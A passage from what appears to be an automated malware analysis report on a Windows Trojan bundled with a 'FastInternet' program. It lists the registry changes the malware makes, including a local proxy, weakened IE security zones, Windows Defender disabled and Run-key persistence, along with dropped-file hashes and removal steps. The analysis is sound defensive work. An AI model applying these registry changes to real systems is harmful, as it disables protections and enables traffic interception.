"Attached" = "1"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"-loopback>
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
[HKLM\SOFTWARE\Microsoft\ESENT\Process\internetport3\DEBUG]
"Trace Level"
The process DYK287G2Jhwy64P0Ln0s.exe:1012 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKCU\Software\Policies\Microsoft\Internet Explorer\Main]
"Isolation" = "Po"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer" = "http=127.0.0.1:8877;https=127.0.0.1:8877"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 22 00 00 00 03 00 00 00 28 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"
[HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\Control Panel]
"proxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"
[HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel]
"proxy" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride" = ""
[HKLM\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxySettingsPerUser" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer" = "http=127.0.0.1:8877;https=127.0.0.1:8877"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9A D1 68 A4 37 35 F9 1E AA 79 96 9C 58 B2 0F BF"
[HKCU\Software\Microsoft\Internet Explorer\Main]
"Isolation" = "Po"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Policies\Microsoft\Internet Explorer\Main]
"Isolation64Bit" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride" = ""
[HKCU\Software\Microsoft\Internet Explorer\Main]
"Isolation64Bit" = "0"-loopback>-loopback>
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
The Trojan disables automatic startup of the application by deleting the following autorun value:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Adobe ARM"
"VMware User Process"
"SunJavaUpdateSched"
The process %original file name%.exe:1756 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKCU\Software\Policies\Microsoft\Internet Explorer\Main]
"Isolation" = "Pn"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer" = "http=127.0.0.1:8877;https=127.0.0.1:8877"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 03 00 00 00 29 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\FastIn]
"UninstallString" = "%Program Files%\FastInternet\dotuninstall.exe"
[HKLM\SOFTWARE\dingdongde]
"dingdongde" = "ok"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Policies\Microsoft\Windows Defender]
"DisableAntiSpyware" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"
[HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\Control Panel]
"proxy" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\FastIn]
"DisplayName" = "FastInternet"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel]
"proxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxySettingsPerUser" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer" = "http=127.0.0.1:8877;https=127.0.0.1:8877"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8E DE 8A 1F 7F B4 35 8D BE 6A 90 41 2B CC 74 11"
[HKCU\Software\Microsoft\Internet Explorer\Main]
"Isolation" = "Pn"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\FastIn]
"Publisher" = "Dotdo"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKCU\Software\Policies\Microsoft\Internet Explorer\Main]
"Isolation64Bit" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride" = ""
[HKCU\Software\Microsoft\Internet Explorer\Main]
"Isolation64Bit" = "0"-loopback>-loopback>
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"interpee" = "C:\a\internetport3.exe"
"dutoauto" = "C:\a\wincheckfe.exe"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"cutoauto" = "C:\a\wincheckfe.exe"
"interpee" = "C:\a\internetport3.exe"
"autoauto" = "63839615.bat"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"rutoauto" = "63839615.bat"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
Dropped PE files
MD5 | File path |
---|---|
a632e8db250976257ee2e73d658ada12 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\yuntnani\vchk.exe |
8614c450637267afacad1645e23ba24a | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsg8.tmp\FindProcDLL.dll |
c17103ae9072a06da581dec998343fc1 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsg8.tmp\System.dll |
c498ae64b4971132bba676873978de1e | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsg8.tmp\inetc.dll |
99f345cf51b6c3c317d20a81acb11012 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nshA.tmp\KillProcDLL.dll |
c17103ae9072a06da581dec998343fc1 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nshA.tmp\System.dll |
c498ae64b4971132bba676873978de1e | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nshA.tmp\inetc.dll |
c17103ae9072a06da581dec998343fc1 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsiF.tmp\System.dll |
c498ae64b4971132bba676873978de1e | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsiF.tmp\inetc.dll |
acc2b699edfea5bf5aae45aba3a41e96 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsiF.tmp\nsExec.dll |
c17103ae9072a06da581dec998343fc1 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsjB.tmp\System.dll |
c498ae64b4971132bba676873978de1e | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsjB.tmp\inetc.dll |
acc2b699edfea5bf5aae45aba3a41e96 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsjB.tmp\nsExec.dll |
8614c450637267afacad1645e23ba24a | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsw6.tmp\FindProcDLL.dll |
c17103ae9072a06da581dec998343fc1 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsw6.tmp\System.dll |
c17103ae9072a06da581dec998343fc1 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsyD.tmp\System.dll |
a632e8db250976257ee2e73d658ada12 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\IE36GWQC\vchk[1].exe |
2df723b3cb50a002fca6e8c63a7a487f | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\SZPECZLK\DYK287G2Jhwy64P0Ln0s[1].exe |
cb6a1aa1be943fd5aa85bd18708f759b | c:\Program Files\FastInternet\app.exe |
29ff2eda9ef60448c67860c675175072 | c:\Program Files\FastInternet\dotuninstall.exe |
42badc1d2f03a8b1e4875740d3d49336 | c:\a\7za.exe |
2df723b3cb50a002fca6e8c63a7a487f | c:\a\DYK287G2Jhwy64P0Ln0s.exe |
b19e81fc91a71a7222e63ea4f09771af | c:\a\FiddlerCore.dll |
da9dbf01355305af60037cd13ccf2968 | c:\a\getcap.exe |
2943023b33bb769d64721d4edccbd00b | c:\a\internetport3.exe |
e703835506e5dab34f20b5b496a38f72 | c:\a\wcheckf.exe |
813d46d64e42bf222676084e12e2e80d | c:\a\wincheckfe.exe |
7988bca8dfaacb79579fd000a31e69cf | c:\a\winonit.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
WMIC.exe:568
vchk.exe:1656
taskkill.exe:216
taskkill.exe:1140
taskkill.exe:668
taskkill.exe:136
taskkill.exe:492
taskkill.exe:1832
taskkill.exe:1836
taskkill.exe:1772
taskkill.exe:1548
taskkill.exe:1372
taskkill.exe:936
taskkill.exe:2012
taskkill.exe:1096
taskkill.exe:628
taskkill.exe:1092
taskkill.exe:1492
taskkill.exe:1956
taskkill.exe:1952
taskkill.exe:828
taskkill.exe:1668
taskkill.exe:820
taskkill.exe:376
taskkill.exe:596
taskkill.exe:1124
taskkill.exe:316
taskkill.exe:1088
taskkill.exe:1928
taskkill.exe:1852
taskkill.exe:1856
taskkill.exe:1252
taskkill.exe:1016
taskkill.exe:916
taskkill.exe:1656
taskkill.exe:308
taskkill.exe:448
taskkill.exe:1232
taskkill.exe:440
taskkill.exe:1136
taskkill.exe:1932
taskkill.exe:908
taskkill.exe:1240
taskkill.exe:648
taskkill.exe:1632
taskkill.exe:516
taskkill.exe:1348
taskkill.exe:1340
taskkill.exe:336
taskkill.exe:576
taskkill.exe:856
taskkill.exe:1424
taskkill.exe:1980
taskkill.exe:1584
taskkill.exe:652
taskkill.exe:508
taskkill.exe:480
taskkill.exe:568
taskkill.exe:468
taskkill.exe:464
taskkill.exe:564
taskkill.exe:1804
taskkill.exe:168
taskkill.exe:228
taskkill.exe:1868
taskkill.exe:224
taskkill.exe:1916
taskkill.exe:968
taskkill.exe:1180
taskkill.exe:1456
taskkill.exe:1748
taskkill.exe:1740
taskkill.exe:740
taskkill.exe:1160
taskkill.exe:884
taskkill.exe:1204
taskkill.exe:608
taskkill.exe:552
taskkill.exe:1968
taskkill.exe:872
taskkill.exe:956
taskkill.exe:320
taskkill.exe:1112
taskkill.exe:324
taskkill.exe:1752
taskkill.exe:612
taskkill.exe:1888
taskkill.exe:1884
taskkill.exe:1760
taskkill.exe:1880
taskkill.exe:1284
taskkill.exe:512
taskkill.exe:1472
taskkill.exe:808
taskkill.exe:2008
taskkill.exe:1368
%original file name%.exe:1756 - Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
C:\a\avv.txt (2432 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ICMA9FQ2\vv[1].htm (2432 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SXBXQRST\uur[1].htm (2 bytes)
C:\a\ahho.txt (4 bytes)
C:\a\auur.txt (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nshA.tmp\inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IE36GWQC\hho[1].htm (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nshA.tmp\KillProcDLL.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nshA.tmp\System.dll (11 bytes)
C:\a\7za.exe (15192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsyD.tmp\System.dll (11 bytes)
%Program Files%\FastInternet\TempWmicBatchFile.bat (0 bytes)
C:\a\ProcessList.txt (1888 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\FindProcDLL.dll (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg8.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg8.tmp\FindProcDLL.dll (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\yuntnani\vchk.exe (3808 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IE36GWQC\vchk[1].exe (3808 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg8.tmp\inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns4B.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns22.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns77.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns84.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns1A.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns7E.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns18.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns86.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns3A.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns11.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns81.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns8B.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns8E.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns62.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns8F.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns97.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns56.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns26.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns24.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns6E.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsA1.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns23.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns75.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns87.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns64.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns99.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns2C.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns4D.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns14.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns8D.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns72.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns9E.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns9B.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns57.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns25.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns5B.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns76.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns6A.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns47.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns1F.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns7F.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsExec.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns6C.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns2D.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns51.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns5C.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns94.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsAF.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns92.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsAA.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns61.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns48.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns29.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsA2.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns59.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns78.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns6B.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsA6.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns53.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns3D.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsAE.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns16.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns1B.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns93.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns83.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns74.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns2B.tmp (6 bytes)
C:\a\avchk.txt (2026 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns54.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsAC.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsA5.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns50.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns63.tmp (6 bytes)
